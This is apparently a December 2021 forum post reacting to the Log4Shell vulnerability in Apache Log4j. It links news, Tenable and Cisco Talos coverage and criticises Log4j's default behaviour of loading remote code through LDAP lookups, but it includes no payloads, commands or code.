First, for non-IT people, a mainstream article ...
abcnews.go.com
Now, for us Dungeon IT Geeks (don't get me that 'professional'), This is not good ...
Someone else even claims a Black Hat talk from 2016 identified this issue, which wouldn't surprise me.
Maybe I'm missing something, but I don't know why log4j's devs seemed to think it's wise to pull and execute any plugin -- essentially any arbitrary code -- from any LDAP store (and seemingly DNS, among via one other protocol) ... and, most of all, enable it by default. That latter was just ... well ... chronically stupid. How this escaped all the eyes of open source for over 5 years -- although maybe it didn't if the Black Hat talk comment is true -- is beyond me.
I'm not an anti-Java guy, but as a colleague I greatly respect put oh-so-well ... "Java is the new COBOL." I've never liked 'stack machines' (I won't go further into my EE bigotry against CS), and we've reached that point. Rust the Internet. Even Linus sees value.
I'll quote the Tenable (e.g., Nessus) for issues related to the Proof-of-Concept (PoC) log4shell and other, known information as of Fri 12/10.
www.tenable.com
Assuming the prior PoC from March isn't the same (although looks similar enough), the attacks have been in the wild since 9 days before disclosure. But given how much of a massive oversight this is, and how much LDAP store lookups are used for almost everything -- including to Active Directory (it's also LDAPv3 based, although it's had similar RFC exploits, but nothing so generic like this across Java/non-Windows) -- this is really bad.
blog.talosintelligence.com
New cyber vulnerability poses 'severe risk,' DHS says
The vulnerability is linked to a commonly used piece of software called Log4j, a utility that runs in the background of many commonly used software applications.
Now, for us Dungeon IT Geeks (don't get me that 'professional'), This is not good ...
Someone else even claims a Black Hat talk from 2016 identified this issue, which wouldn't surprise me.
Maybe I'm missing something, but I don't know why log4j's devs seemed to think it's wise to pull and execute any plugin -- essentially any arbitrary code -- from any LDAP store (and seemingly DNS, among via one other protocol) ... and, most of all, enable it by default. That latter was just ... well ... chronically stupid. How this escaped all the eyes of open source for over 5 years -- although maybe it didn't if the Black Hat talk comment is true -- is beyond me.
I'm not an anti-Java guy, but as a colleague I greatly respect put oh-so-well ... "Java is the new COBOL." I've never liked 'stack machines' (I won't go further into my EE bigotry against CS), and we've reached that point. Rust the Internet. Even Linus sees value.
I'll quote the Tenable (e.g., Nessus) for issues related to the Proof-of-Concept (PoC) log4shell and other, known information as of Fri 12/10.
CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
Critical vulnerability in the popular logging library, Log4j 2, impacts a number of services and applications, including Minecraft, Steam and Apple iCloud. Attackers have begun actively scanning for and attempting to exploit the flaw.
Assuming the prior PoC from March isn't the same (although looks similar enough), the attacks have been in the wild since 9 days before disclosure. But given how much of a massive oversight this is, and how much LDAP store lookups are used for almost everything -- including to Active Directory (it's also LDAPv3 based, although it's had similar RFC exploits, but nothing so generic like this across Java/non-Windows) -- this is really bad.
Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
Update History DateDescription of UpdatesDec. 20, 2021 Additional coverage and IOCs; additional detection capabilities for customers via Cisco Global Threat Alerts. Dec. 18, 2021 Additional mitigation guidance; updated coverage information. Dec. 17, 2021 Added additional vulnerability and...
blog.talosintelligence.com
